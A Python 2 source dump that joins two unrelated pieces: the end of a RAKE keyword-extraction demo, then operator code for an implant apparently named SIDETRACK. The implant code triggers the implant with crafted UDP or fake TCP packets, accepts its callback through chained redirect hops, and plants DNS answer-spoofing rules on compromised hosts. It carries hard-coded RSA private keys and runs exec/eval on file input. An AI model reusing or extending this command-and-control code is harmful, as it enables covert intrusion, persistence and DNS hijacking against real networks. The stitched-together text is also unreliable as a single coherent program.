        sorted_keywords = sorted(keyword_candidates.iteritems(), key=operator.itemgetter(1), reverse=True)
        return sorted_keywords
# Demo: run the RAKE pipeline step by step, then via the Rake class.
if test:
    text = "Compatibility of systems of linear constraints over the set of natural numbers. Criteria of compatibility of a system of linear Diophantine equations, strict inequations, and nonstrict inequations are considered. Upper bounds for components of a minimal set of solutions and algorithms of construction of minimal generating sets of solutions for all types of systems are given. These criteria and the corresponding algorithms for constructing a minimal supporting set of solutions can be used in solving all the considered types of systems and systems of mixed types."
    # Split text into sentences
    sentenceList = split_sentences(text)
    #stoppath = "FoxStoplist.txt" #Fox stoplist contains "numbers", so it will not find "natural numbers" like in Table 1.1
    stoppath = "SmartStoplist.txt"  #SMART stoplist misses some of the lower-scoring keywords in Figure 1.5, which means that the top 1/3 cuts off one of the 4.0 score words in Table 1.1
    stopwordpattern = build_stop_word_regex(stoppath)
    # generate candidate keywords
    phraseList = generate_candidate_keywords(sentenceList, stopwordpattern)
    # calculate individual word scores
    wordscores = calculate_word_scores(phraseList)
    # generate candidate keyword scores
    keywordcandidates = generate_candidate_keyword_scores(phraseList, wordscores)
    if debug: print keywordcandidates
    # Sort candidates by score, best first (Python 2 iteritems()).
    sortedKeywords = sorted(keywordcandidates.iteritems(), key=operator.itemgetter(1), reverse=True)
    if debug: print sortedKeywords
    totalKeywords = len(sortedKeywords)
    if debug: print totalKeywords
    # RAKE convention: report the top third of the scored candidates.
    print sortedKeywords[0:(totalKeywords / 3)]
    # Same pipeline, driven through the Rake class, for comparison.
    rake = Rake("SmartStoplist.txt")
    keywords = rake.run(text)
    print keywords
|
import base
import crypto
import echocmd
import string
import struct
import time
import re
import os
import sys
from socket import *
import rawtcp
import types
class SIDECMD(echocmd.ECHOCMD):
def __init__(self):
echocmd.ECHOCMD.__init__(self)
def TypeConvert(self, stype):
#print "In TypeConvert %d" % (stype)
if type(stype) != type(''):
if stype == 1:
stype = "A"
elif stype == 2:
stype = "NS"
elif stype == 3:
stype = "MD"
elif stype == 4:
stype = "MF"
elif stype == 5:
stype = "CNAME"
elif stype == 6:
stype = "SOA"
elif stype == 7:
stype = "MB"
elif stype == 8:
stype = "MG"
elif stype == 9:
stype = "MR"
elif stype == 10:
stype = "NULL"
elif stype == 11:
stype = "WKS"
elif stype == 12:
stype = "PTR"
elif stype == 13:
stype = "HINFO"
elif stype == 14:
stype = "MINFO"
elif stype == 15:
stype = "MX"
elif stype == 16:
stype = "TXT"
elif stype == 252:
stype = "AXFR"
elif stype == 253:
stype = "MAILB"
elif stype == 254:
stype = "MAILA"
elif stype == 255:
stype = "*"
return stype
def ConvertType(self, rtype):
if type(rtype) != type(0):
rtype = string.upper(rtype)
if rtype == "A":
rtype = 1
elif rtype == "NS":
rtype = 2
elif rtype == "MD":
rtype = 3
elif rtype == "MF":
rtype = 4
elif rtype == "CNAME":
rtype = 5
elif rtype == "SOA":
rtype = 6
elif rtype == "MB":
rtype = 7
elif rtype == "MG":
rtype = 8
elif rtype == "MR":
rtype = 9
elif rtype == "NULL":
rtype = 10
elif rtype == "WKS":
rtype = 11
elif rtype == "PTR":
rtype = 12
elif rtype == "HINFO":
rtype = 13
elif rtype == "MINFO":
rtype = 14
elif rtype == "MX":
rtype = 15
elif rtype == "TXT":
rtype = 16
elif rtype == "AXFR":
rtype = 252
elif rtype == "MAILB":
rtype = 253
elif rtype == "MAILA":
rtype = 254
elif rtype == "*":
rtype = 255
return rtype
def ClassConvert(self, rclass):
#print "In ClassConvert %d" % (rclass)
if type(rclass) != type(''):
if rclass == 1:
rclass = "IN"
elif rclass == 2:
rclass = "CS"
elif rclass == 3:
rclass = "CH"
elif rclass == 4:
rclass = "HS"
return rclass
def ConvertClass(self, rclass):
if type(rclass) != type(0):
rclass = string.upper(rclass)
if rclass == "IN":
rclass = 1
elif rclass == "CS":
rclass = 2
elif rclass == "CH":
rclass = 3
elif rclass == "HS":
rclass = 4
return rclass
def ConvertFlags(self, flags):
# qr rd ra
retFlags = 0
if type(flags) != type(0):
flags = string.upper(flags)
if flags == "RA":
retFlags = retFlags | 0x0080L
if flags == "AA":
retFlags = retFlags | 0x0400L
return retFlags
def SectionConvert(self,section):
if type(section) != type(''):
if section == 0:
section = "query"
elif section == 1:
section = "ans"
elif section == 2:
section = "auth"
elif section == 3:
section = "add"
return section
def ConvertSection(self,section):
if type(section) != type(0):
section = string.upper(section)
if section[:1] == "Q":
section = 0
elif section[:2] == "AN":
section = 1
elif section[:2] == "AU":
section = 2
elif section[:2] == "AD":
section = 3
return section
def NameConvertName(self, name):
ret = ''
sp = 0
if type(name) != type(0):
while name[sp:sp+1] != '\000':
namelen = struct.unpack("!H",'\000' + name[sp:sp+1])[0]
#print namelen
if sp != 0:
ret = ret + '.'
for i in range(1,namelen+1):
val = struct.unpack("!H", '\000' + name[sp+i:sp+i+1])[0]
if val >= 32 and val < 127:
ret = ret + name[sp+i:sp+i+1]
else:
raise TypeError, self.HexConvert(name)
sp = sp+1+namelen
return ret
def NameConvert(self, name, padding=0):
try:
return self.NameConvertName(name)
except:
return self.HexConvert(name, padding)
def ConvertName(self, name):
ret = ''
regExpr = re.compile("^[a-zA-Z0-9-_.]*$")
if type(name) != type(0x0L):
reg = regExpr.search(name)
if reg != None:
dots = string.splitfields(name,".")
for i in range(len(dots)):
ret = ret + chr(len(dots[i])) + dots[i]
ret = ret + '\000'
return ret
else:
return name
else:
return struct.pack("!H",name)
def FlagConvert(self, flag):
if flag == 0:
return "Ignore"
elif flag == 1:
return "Count"
elif flag == 2:
return "Active"
def HexConvert(self,data,pad=0):
ret = ''
padding = ''
for i in range(pad):
padding = padding + ' '
for i in range(len(data)):
if i % 16 == 0 and i != 0:
ret = ret + '\n' + padding
myNum = struct.unpack("!H", '\000'+data[i:i+1])[0]
ret = ret + "%02x " % myNum
ret = ret + '\n' + padding + "(%d)" % (len(data))
return ret
class SIDETRACK(base.Implant):
    """Session-side driver for the SIDETRACK implant: selects the cipher by
    implant version, holds the RSA parameters used by the protocol, and
    registers all SIDETRACK commands."""

    def __init__(self, session, proto):
        base.Implant.__init__(self, session, proto)
        self.name = 'SIDETRACK'
        self.newCV = None
        self.targetopts = self.session.target.GetImplantOpts('sidetrack')
        self.version = self.targetopts['VERSION']
        # Implants >= 2.0 speak RC6; older ones RC5.
        if self.version >= 2.0:
            self.cipher = crypto.rc6()
        else:
            self.cipher = crypto.rc5()
        self.cipher.SetKey(self.targetopts['KEY'])
        # RSA modulus/private exponent pairs: (N, d) for encryption,
        # (Nsign, dsign) for signing (Python 2 long literals).
        self.N = 0xdec9ba81a6b9ea70c876ad3413aa7dd57be75d42e668843b1401fd42015144231004bfab4e459dabdbb159665b48a4d72357c3630d0e911b5b96bf0b0d8ab83f4bb045a13ea2acc85d120c3539f206200b9931a41ad6141eb7212e66784880ff6f32b16e1783d4ca52fe5ec484ef94f019feaf58abbc5de6a62f10eec347ac4dL
        self.d = 0x25219f159bc9a712cc13c788adf1bfa394a68f8b2666c0b48355aa35aae2e0b082ab754737b644f1f9f2e43bb9e170ce85e3f5e5d7826d848f43ca81d7971eb4e7a62bc8e5e0a549bcb9ecb216451f8ba32444a71cb0ff97a77500cb39f802968ae7c10366d3eed895b939ec54eb8c4c54329bddb0eb00e691bc6b5d10d5af05L
        self.Nsign = 0xb2003aac88a36d45d840bc748aa972b3f2e69a29f43f1e2faf810d9172db756d4843492489781764688d29c3a547a1522702d20e10f426149ac2f323bf35dfa1cb036f467109fd321bae03711eab16b210ed131ac077113f1dd34be480508708893c1a40fdc1b1d637e1cf3efd13e6bbbdc88a8c2fc103a45c490ba933a79a31L
        self.dsign = 0x076aad1c85b179e2e902b284db1c64c77f74466c6a2d4beca7500b3b64c924e48dad786185ba564ed9b08c6826e2fc0e16f5736b40b4d6eb8672ca217d4ce95156a1920e3e48fe1dfe82738bb6ec985c441421d188962b141d3113773e8006b1273de6b846635ff7979547b516d7c426d5c3b0e2505150095b81e266e3b97c03L
        self.packetSize = 450
        # Clock skew between us and the target, from target metadata.
        self.timediff = self.session.target.timediff
        # Redirection/tunnelling bookkeeping for chained sessions.
        self.localRedir = None
        self.parent = None
        self.children = []
        self.rules = []

    def RegisterCommands(self):
        """Register the generic echo commands plus every SIDETRACK-specific
        DNS/redirect/connection command under its user-facing name."""
        self.AddCommand('ping', echocmd.ECHOCMD_PING)
        self.AddCommand('status', echocmd.ECHOCMD_STATUS)
        self.AddCommand('done', echocmd.ECHOCMD_DONE)
        self.AddCommand('setsize', echocmd.ECHOCMD_SETSIZE)
        self.AddCommand('timediff', echocmd.ECHOCMD_TIMEDIFF)
        self.AddCommand('incision', echocmd.ECHOCMD_INCISION)
        self.AddCommand('rekey', echocmd.ECHOCMD_REKEY)
        self.AddCommand('switchkey', echocmd.ECHOCMD_SWITCHKEY)
        self.AddCommand('origkey', echocmd.ECHOCMD_ORIGKEY)
        self.AddCommand('key', echocmd.ECHOCMD_KEY)
        self.AddCommand('init', SIDECMD_INIT)
        self.AddCommand('dnsadd', SIDECMD_DNSADD)
        self.AddCommand('dnsrm', SIDECMD_DNSREMOVE)
        self.AddCommand('dnsset', SIDECMD_DNSSET)
        self.AddCommand('dnsaction', SIDECMD_DNSACTION)
        self.AddCommand('dnsraw', SIDECMD_DNSRAW)
        self.AddCommand('dnslist', SIDECMD_DNSLIST)
        self.AddCommand('dnsload', SIDECMD_DNSLOAD)
        self.AddCommand('dnssave', SIDECMD_DNSSAVE)
        self.AddCommand('rediradd', SIDECMD_REDIRADD)
        self.AddCommand('redirlist', SIDECMD_REDIRLIST)
        self.AddCommand('redirset', SIDECMD_REDIRSET)
        self.AddCommand('redirrm', SIDECMD_REDIRREMOVE)
        self.AddCommand('connlist', SIDECMD_CONNLIST)
        self.AddCommand('connrm', SIDECMD_CONNREMOVE)
        self.AddCommand('stunload', SIDECMD_UNLOAD)
        self.AddCommand('connect', SIDECMD_CONNECT)
        self.AddCommand('cclist', SIDECMD_CCLIST)
        self.AddCommand('ccremove', SIDECMD_CCREMOVE)
        self.AddCommand('multiaddr', SIDECMD_MULTIADDR)
##########################################################################
# HASANOTHERADDRESS class
#########################################################################
class SIDECMD_MULTIADDR(SIDECMD):
    """Record whether the target host owns more than one address; the flag
    is read by the connect command when choosing redirect rules."""

    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "multiaddr"
        self.usage = "multiaddr <0|1>"
        self.info = "Let pyside know that the target has multiple addresses"

    def run(self, value=1):
        # Store the flag on the target; defaults to "has multiple" (1).
        self.implant.session.target.hasAnotherAddress = value
        return (1, "Value updated")
##########################################################################
# CONNECT class
#########################################################################
class SIDECMD_CONNECT(SIDECMD):
    """Establish the command-and-control connection to a SIDETRACK implant,
    optionally tunnelling through a previously-connected hop session."""

    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "connect"
        self.usage = "connect <listen_address>:<listen_port>/<callback_port> <trigger_port>"
        self.info = "Connect to SIDETRACK"

    def parseHostInfo(self, host):
        """Parse "<addr>:<listen_port>/<callback_port>".

        <addr> may be an IP or the name of an existing session (a hop).
        Returns (session_or_None, ip, listen_port, callback_port); raises
        ValueError on any malformed piece.  Wildcard "*" ports are rejected.
        """
        #split the ip from the ports
        res = string.split(host, ":")
        if len(res) == 1:
            raise ValueError, host
        elif len(res) == 2:
            ports = string.split(res[1], "/")
            if len(ports) != 2:
                raise ValueError, host
            if ports[0] == "*":
                raise ValueError, ports[0]
            else:
                ports[0] = eval(ports[0])  # NOTE(review): eval on user input; int() would be safer
            if ports[1] == "*":
                raise ValueError, ports[1]
            else:
                ports[1] = eval(ports[1])  # NOTE(review): eval on user input; int() would be safer
            try:
                host = None
                ipaddr = self.ConvertIP(res[0])
            except:
                # host references a session
                host = base.sessionDict[res[0]]
                ipaddr = self.ConvertIP(host.target.GetIP())
            return host, ipaddr, ports[0], ports[1]
        else:
            raise ValueError, host

    def run(self, hostinfo, fport):
        """Open a local listener, set up any hop redirect rules, trigger the
        implant (UDP port 500 when fport == 0, else a fake TCP connection to
        fport), then accept the callback and run "init"."""
        # Parse the ports
        prevRule = None
        tempRule = None
        localRedir = None
        host, laddr, lport, cbport = self.parseHostInfo(hostinfo)
        if fport == 0:
            # Trigger over UDP 500 (ISAKMP) when no TCP trigger port given.
            PORT = 500
        #open the listener
        try:
            sock = socket(AF_INET, SOCK_STREAM, 0)
            sock.bind(('', lport))
            sock.listen(2)
        except error, message:
            return (0, "Could not open port %d %s" % (lport, message))
        # See if the user entered another host
        if host != None:
            self.implant.parent = host
            #hpn is the hop prior to host (might just be "me")
            hpn = host.implant.parent.name
            myname = host.name
            hostinfo = re.sub(myname, hpn, hostinfo)
            # Testing
            localRedir = REDIRECT(self, 0, 10800, 10800, 6,\
                self.ConvertIP(self.implant.session.target.ip), \
                self.ConvertIP(self.implant.session.target.ip),
                0, 0, 0, (0, 0, 0, 0), 0, 0x201, lport, cbport, 0, 0)
            localRedir.add(0)
            self.implant.session.localRedir = localRedir
            # Add a redirect (on the previous host) for this connection
            cmd = host.GetCommand('rediradd')
            base.ccSupport = 1
            res = cmd.run("tcp", hostinfo, "%s:%d/%d" % (self.implant.session.target.ip, cbport, lport), "-tfix", "-afix", "-l", "3h", "-c", "3h")
            base.ccSupport = 0
            if res[0] == 0:
                return res
            # Let the previous implant know this redirect rule is in support
            # of a command and control connection
            prevRule = cmd.redir
            if prevRule != None:
                prevRule.ccPassthru = self.implant.session
            # Add a temporary rule to allow the trigger to be passed to target
            base.ccSupport = 1
            if fport == 0:
                res = cmd.run("udp", "%s:%d/%d" % (hpn, PORT, PORT), "%s:%d/%d" % (self.implant.session.target.ip, PORT, PORT), "-tfix", "-afix")
            else:
                res = cmd.run("tcp", "%s:%d/%d" % (hpn, 0, fport), "%s:%d/%d" % (self.implant.session.target.ip, fport, 0), "-tfix")
            base.ccSupport = 0
            base.db(2, "%d.%d.%d.%d" % (res[2] >> 24, (res[2] >> 16) & 0xff, (res[2] >> 8) & 0xff, res[2] & 0xff))
            if res[0] == 0:
                if prevRule != None:
                    prevRule.remove()
                return (0, "Unable to establish redir for port %d: %s" % (fport, res[1]))
            tempRule = cmd.redir
        else:
            # Direct connection: no hop bookkeeping needed.
            localRedir = None
            prevRule = None
            self.implant.session.localRedir = None
        #add the rule
        if tempRule == None or (tempRule != None and \
            cmd.implant.session.target.hasAnotherAddress == 0):
            rule = base.redir.listen(laddr,\
                self.ConvertIP(self.implant.session.target.ip),\
                fport, lport, cbport,\
                self.implant.timediff, \
                self.implant.cipher.GetKey())
        else:
            # Multi-homed hop: listen on the hop rule's SIDETRACK address.
            rule = base.redir.listen(tempRule.ST_ip,\
                self.ConvertIP(self.implant.session.target.ip),\
                fport, lport, cbport,\
                self.implant.timediff, \
                self.implant.cipher.GetKey())
        #Make the connection
        if fport == 0:
            # UDP trigger: random payload dressed up with the magic marker.
            conn = socket(AF_INET, SOCK_DGRAM, 0)
            conn.bind(('', PORT))
            conn.connect((self.implant.session.target.ip, PORT))
            f = os.popen("dd if=/dev/urandom bs=128 count=3 2>/dev/null")
            d = f.read()
            f = None
            data = d[0:14] + struct.pack("HBBBB", 0, 0x08, 0x10, 0x20, 0x01) + \
                d[16:20] + struct.pack("!L", 0x154) + d[20:332]
            conn.send(data)
            conn.close()
            #accept
            self.implant.protocol.sock, addr = sock.accept()
        else:
            #conn = socket(AF_INET,SOCK_STREAM,0)
            # STUB: Catch this in a try statement
            try:
                # esev - 6/24/03
                #conn.connect((self.implant.session.target.ip,fport))
                #conn.close()
                #conn = None
                rawtcp.sendFakeConnection(self.implant.session.target.ip, fport)
                # STUB: Put a timeout here
                #accept
                self.implant.protocol.sock, addr = sock.accept()
            except:
                # Interrupted/failed: tear down everything we set up above.
                base.redir.delete(rule)
                sock.close()
                sock = None
                #if conn != None:
                #    conn.close()
                if localRedir != None:
                    localRedir.remove()
                if prevRule != None:
                    prevRule.remove()
                if tempRule != None:
                    tempRule.remove()
                base.sessionDict[self.implant.session.name] = None
                return (1, "Canceled by user, target %s removed" % self.implant.session.name)
        sock.close()
        sock = None
        # Set the CC redirect to inactive. This will not effect the
        # current connection..only prevent the rule from getting in the way
        if prevRule != None:
            prevRule.set(0)
        #if there is a connection back return 1 else 0
        if self.implant.protocol.sock:
            cmd = self.implant.session.GetCommand("init")
            res = cmd.run()
            # remove the temporary redirect
            if tempRule != None:
                tempRule.remove()
            # remove the connection rule
            base.redir.delete(rule)
            if res[0] == 0:
                return res
            else:
                sys.stderr.write("%s\n" % (res[1]))
            return (1, "Connected")
        else:
            # remove the temporary redirect
            if tempRule != None:
                tempRule.remove()
            # remove the connection rule
            base.redir.delete(rule)
            return (0, "Could not connect")
##########################################################################
# INIT class
# op code: 0x20
#########################################################################
class SIDECMD_INIT(SIDECMD):
    """Initialize a freshly-connected implant: ping, re-key (up to three
    attempts), switch to the new key, then query status.

    op code: 0x20
    """

    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "init"
        self.usage = "init"
        self.info = "Initialize the implant"

    def run(self):
        # Base-class run() returns an error message, or None to proceed.
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0, msg)
        cmd = self.implant.session.GetCommand("ping")
        res = cmd.run()
        if res[0] == 0:
            return res
        else:
            sys.stderr.write("%s\n" % (res[1]))
        # Re-key can fail transiently; try up to three times.
        for i in range(3):
            cmd = self.implant.session.GetCommand("rekey")
            res = cmd.run()
            if res[0] != 0:
                break
        if res[0] == 0:
            return res
        else:
            sys.stderr.write("%s\n" % (res[1]))
        cmd = self.implant.session.GetCommand("switchkey")
        res = cmd.run()
        if res[0] == 0:
            return res
        else:
            sys.stderr.write("%s\n" % (res[1]))
        cmd = self.implant.session.GetCommand("status")
        res = cmd.run()
        if res[0] == 0:
            return res
        else:
            sys.stderr.write("%s\n" % (res[1]))
        return (1, "Initialization complete")
##########################################################################
# DNSREAD class
#########################################################################
class SIDECMD_DNSLOAD(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsload"
self.usage = "dnsload <filename>"
self.info = "Send DNS data from a file to the target"
#-------------------------------------------------------------------------
# Name : ProcessArg
# Purpose: Tests to see if the argument is a string or number
# Receive: arg - The argument to test
# Return : The original string if a number, or a quoted string if not
#-------------------------------------------------------------------------
def ProcessArg(self,arg):
if (re.match('^-?[0-9]*(\.[0-9]+)?$',arg) != None or \
re.match('^0x[0-9a-fA-F]+L?', arg) != None):
return arg
else:
return '"' + arg + '"'
def runRule(self, args):
cmd = SIDECMD_DNSADD()
cmd.implant = self.implant
argString = 'myRes = cmd.run('
for i in range(1,len(args)):
if i == 1:
argString = argString + self.ProcessArg(args[i])
else:
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
if myRes and myRes[0]:
self.lastRule = myRes[0]
def runSet(self, args):
cmd = SIDECMD_DNSSET()
cmd.implant = self.implant
argString = 'myRes = cmd.run(self.lastRule'
for i in range(1,len(args)):
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
def runCmd(self, args):
cmd = SIDECMD_DNSACTION()
cmd.implant = self.implant
argString = 'tmp = cmd.run(self.lastRule'
for i in range(len(args)):
argString = argString + ", " + self.ProcessArg(args[i])
argString = argString + ')'
print argString
exec(argString)
def run(self, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
file = open(filename,'r')
self.lastRule = 0
while 1:
line = file.readline()
if not line:
line = None
return (1, "Input from file complete")
args = base.SplitCommandString(string.strip(line))
if len(args) == 0:
continue
elif args[0][0:1] == '#' or args[0] == '':
continue
elif args[0] == "rule":
self.runRule(args)
print "Rule %d added\n" % (self.lastRule)
elif args[0] == "set":
self.runSet(args)
else:
self.runCmd(args)
return (0, "problem")
##########################################################################
# DNSADD class
# op code: 0x18
#########################################################################
class SIDECMD_DNSADD(SIDECMD):
    # Sends the 0x18 "add DNS rule" request.  Payload layout (from the
    # pack call below): from-ip, from-mask, longevity, dns-flags, type,
    # class, name length, then the wire-encoded name.
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "dnsadd"
        self.usage = "dnsadd <from ip> <from mask> <longevity> <type> <class> <name> [dns flags]"
        self.info = "Add a DNS entry into sidetrack (see also dnsset)"
        self.op = 0x18L
    def run(self,ip,mask,length,rtype,rclass,name,flags=0x0080L):
        """Add one DNS rule.  On success the first slot of the returned
        tuple carries the implant-assigned rule number (not just 1);
        on failure it is 0."""
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        # Normalize the human-friendly arguments into wire representations
        # via the inherited Convert* helpers.
        ipStr = self.ConvertIP(ip)
        maskStr = self.ConvertIP(mask)
        rtype = self.ConvertType(rtype)
        rclass = self.ConvertClass(rclass)
        name = self.ConvertName(name)
        length = self.ConvertTime(length)
        self.data = ipStr + maskStr + struct.pack("!LHHHH",length,flags,\
                                                  rtype,rclass,len(name)) +name
        self.Query()
        if( self.op == 0x18L and self.res == 0x1L ):
            # First 4 bytes of the reply hold the new rule's id.
            dnsRes = struct.unpack("!l",self.data[0:4])[0]
            return (dnsRes, "Add successful, rule number: %d" % dnsRes)
        else:
            return (0, "Add failed")
##########################################################################
# DNSREMOVE class
# op code: 0x19
#########################################################################
class SIDECMD_DNSREMOVE(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsrm"
self.usage = "dnsrm <rule|all>"
self.info = "Remove a dns rule"
self.op = 0x19L
def run(self,rule):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
if type(rule) == type("a") and string.upper(rule)[:1] == 'A':
rule = 0
self.data = struct.pack("!l",rule)
self.Query()
if self.op == 0x19L and self.res == 0x01L:
return (1,"Rule(s) removed")
else:
return (0,"unable to remove rule(s)")
##########################################################################
# DNSSET class
# op code: 0x20
#########################################################################
class SIDECMD_DNSSET(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsset"
self.usage = "dnsset <rule> <ignore|count|active>"
self.info = "Turn a DNS rule on or off"
self.op = 0x20L
def run(self,rule,onoff):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0,msg)
self.data = struct.pack("!l",rule)
if onoff[0:1] == "a" or onoff[0:1] == "A":
self.data = self.data + struct.pack("!h", 2)
elif onoff[0:1] == "c" or onoff[0:1] == "C":
self.data = self.data + struct.pack("!h", 1)
else:
self.data = self.data + struct.pack("!h", 0)
self.Query()
if self.op == 0x20L and self.res == 0x01L:
return (1,"rule %d successfully set to %s" %\
(rule, onoff))
else:
return (0,"unable to set rule to %s" % onoff)
##########################################################################
# DNSRAW class
# op code: 0x21
#########################################################################
class SIDECMD_DNSRAW(SIDECMD):
def __init__(self):
SIDECMD.__init__(self)
self.name = "dnsraw"
self.info = "Upload a binary dns response packet"
self.usage = "dnsraw <rule> <filename>"
self.op = 0x21L
def run(self, rule, filename):
msg = echocmd.ECHOCMD.run(self)
if msg != None:
return (0, msg)
file = open(filename,'r')
file.seek(0,2)
filesize = file.tell()
file.seek(0,0)
maxchunksize = self.implant.packetSize - 34
numchunks = filesize / maxchunksize
if filesize%maxchunksize > 0:
numchunks = numchunks + 1
for i in range(numchunks):
self.data = file.read(maxchunksize)
self.data = struct.pack("!LHHHH",rule,i,numchunks,4,\
len(self.data)) + self.data
self.Query()
if (self.op != 0x21L or self.res != 0x1L):
return (0,"Binary upload failed at chunk %d"%(i+1))
return (1,"Binary upload of %d chunks successful"%(numchunks))
##########################################################################
# DNSACTION class
# op code: 0x21
#########################################################################
class SIDECMD_DNSACTION(SIDECMD):
    # Sets the response content for one section (ans/auth/add) of an
    # existing DNS rule.  Shares opcode 0x21 with SIDECMD_DNSRAW.
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "dnsaction"
        self.info = "Set the action for a rule"
        self.usage = "dnsaction <rule> <ans|auth|add> <name> <type> <class> <ttl> <data>"
        self.op = 0x21L
    def run(self,rule,sect,name,rtype,rclass,ttl,data):
        msg = echocmd.ECHOCMD.run(self)
        if msg != None:
            return (0,msg)
        # Convert every human-readable argument to its wire form.
        name = self.ConvertName(name)
        sect = self.ConvertSection(sect)
        rtype = self.ConvertType(rtype)
        rclass = self.ConvertClass(rclass)
        ttl = self.ConvertTime(ttl)
        # Type 1 (A record) data is a packed IP address; anything else is
        # encoded like a DNS name.
        if rtype == 1:
            data = self.ConvertIP(data)
        else:
            data = self.ConvertName(data)
        self.data = struct.pack("!LLHHHHH", rule, ttl, sect, rtype,\
                                rclass,\
                                len(name),\
                                len(data))+\
                                name+data
        self.Query()
        if self.op == 0x21L and self.res == 0x01L:
            return (1,"%s action for rule %d set successfully" % \
                    (sect, rule))
        else:
            return (0,"Could not set action")
##########################################################################
# DNSLIST class
# op code: 0x22
#########################################################################
class SIDECMD_DNSLIST(SIDECMD):
    # Walks and pretty-prints the implant's DNS rule table (op 0x22).
    # Also serves as the base class for SIDECMD_DNSSAVE, which overrides
    # the *String hooks to emit replayable 'dnsload' syntax instead.
    def __init__(self):
        SIDECMD.__init__(self)
        self.name = "dnslist"
        self.usage = "dnslist [-v] [rule] [section]"
        self.info = "Retrieve a section of a rule from SIDETRACK"
        self.op = 0x22L
    def ParseReturn(self):
        """Unpack a rule-query reply from self.data into attributes.
        Pre-2.0 implants do not report the peer's last source port and
        order the ttl/dnsflags fields differently, hence two layouts."""
        if self.implant.version < 2.0:
            self.lastport = 0
            (self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
             self.lastIP, self.lastTime, self.seen, self.flag, self.ttl, \
             self.dnsflags, self.rtype, self.rclass, self.rsec, \
             self.nlen, self.dlen) =\
             struct.unpack("!lLLLLLLHHLHHHHHH", self.data[0:48])
            # Name and record data trail the fixed header back-to-back.
            self.dnsname = self.data[48:48+(self.nlen)]
            self.dnsdata = self.data[48+(self.nlen):48+(self.nlen)+(self.dlen)]
        else:
            (self.retVal, self.rule, self.fromIP, self.fromMask, self.longevity,\
             self.lastIP, self.lastTime, self.seen, self.flag, self.lastport, \
             self.dnsflags, self.ttl, self.rtype, self.rclass, self.rsec, \
             self.nlen, self.dlen) =\
             struct.unpack("!lLLLLLLHHHHLHHHHH", self.data[0:50])
            self.dnsname = self.data[50:50+(self.nlen)]
            self.dnsdata = self.data[50+(self.nlen):50+(self.nlen)+(self.dlen)]
    def GetRuleString(self):
        # Two-line human-readable header (rule id, source filter, state,
        # expiry; then hit count and last peer) plus the section text.
        printOut = "%10d %s/%s %-7s %s\n" % \
                   (self.rule,
                    self.ConvertToDot(self.fromIP),
                    self.ConvertToDot(self.fromMask),
                    self.FlagConvert(self.flag),
                    time.ctime(self.longevity+self.implant.timediff)[4:])
        printOut = printOut + " %5s: %-5d %s:%d %s\n" %\
                   ("count",
                    self.seen,
                    self.ConvertToDot(self.lastIP),
                    self.lastport,
                    time.ctime(self.lastTime + self.implant.timediff))
        return printOut + self.GetSectionString()
    def GetRule(self,rule,sec=0):
        """Fetch one specific rule (non-zero id, zero 'after' cursor)."""
        sec = self.ConvertSection(sec)
        #print "Getting section %d of rule %d\n" % (sec,rule)
        self.data = struct.pack("!LLH",rule,0,sec)
        self.Query()
        if self.op == 0x22L and self.res == 0x01L:
            self.ParseReturn()
            printOut = self.GetRuleString()
            return (1, printOut)
        else:
            return (0,"Error receiving result\n")
    def GetNextRule(self,lastRule,sec=0):
        """Cursor-style iteration: request the rule after lastRule.
        Returns (cursor, text) where cursor is the next rule id, -1 when
        iteration is finished, or 0 on error."""
        sec = self.ConvertSection(sec)
        print "Getting section %d of rule after %d\n" % (sec,lastRule)
        self.data = struct.pack("!LLH",0,lastRule,sec)
        self.Query()
        if self.op == 0x22L and self.res == 0x01L:
            self.ParseReturn()
            # retVal: 0 = a rule was returned, 2 = table is empty,
            # anything else = end of table.
            if self.retVal == 0:
                lastRule = self.rule
            elif self.retVal == 2:
                lastRule = -2
            else:
                lastRule = -1
            if lastRule == -2:
                lastRule = -1
                printOut = 'There are currently no rules'
            else:
                printOut = self.GetRuleString()
            return (lastRule, printOut)
        elif lastRule == 0:
            print self.res
            return (0,"There are currently no rules!")
        else:
            return (0,"Error receiving result\n")
    def GetSectionString(self):
        # Render the currently parsed section: section/type/class/ttl,
        # then the name (octal-escaped on decode failure) and the data
        # (dotted IP for 4-byte A records, name-decoded otherwise).
        printOut = " %5s: %-5s %-3s %-5d " % \
                   (self.SectionConvert(self.rsec),
                    self.TypeConvert(self.rtype),
                    self.ClassConvert(self.rclass),
                    self.ttl&0xffffffL)
        if self.nlen:
            try:
                printOut = printOut + "%s\n" % \
                           (self.NameConvertName(self.dnsname))
            except:
                printOut = printOut + "\n N: %s\n" %\
                           (self.HexConvert(self.dnsname,10))
        if self.dlen:
            if self.rtype == 1 and self.dlen == 4:
                printOut = printOut + \
                           " D: %s\n" % \
                           (self.ConvertToDot(self.dnsdata))
            else:
                printOut = printOut + \
                           " D: %s\n" %\
                           (self.NameConvert(self.dnsdata,10))
        return printOut
    def GetSection(self,rule,section):
        """Fetch one numbered section of a rule; section 4 in the reply
        is treated as 'nothing there' and rendered as an empty string."""
        print "Getting section %d of rule %d\n" % (section,rule)
        self.data = struct.pack("!LLH",rule,0,section)
        self.Query()
        if self.op == 0x22L and self.res == 0x01L:
            self.ParseReturn()
            if self.rsec == 4:
                return (1, '')
            return (1,self.GetSectionString())
        else:
            return (0, "Could not get section")
    def preRuleString(self):
        # Separator emitted before each rule; overridden by DNSSAVE.
        return "-----------------------------------------------------------------------\n"
    def postRuleString(self):
        # Trailer emitted after each rule; overridden by DNSSAVE.
        return ''
    def runAll(self):
        """Verbose walk: every rule plus all three record sections."""
        moreRules = 1
        lastRule = 0
        printOut = ''
        while moreRules:
            res = self.GetNextRule(lastRule)
            if res[0] == 0:
                return res
            elif res[0] == -1:
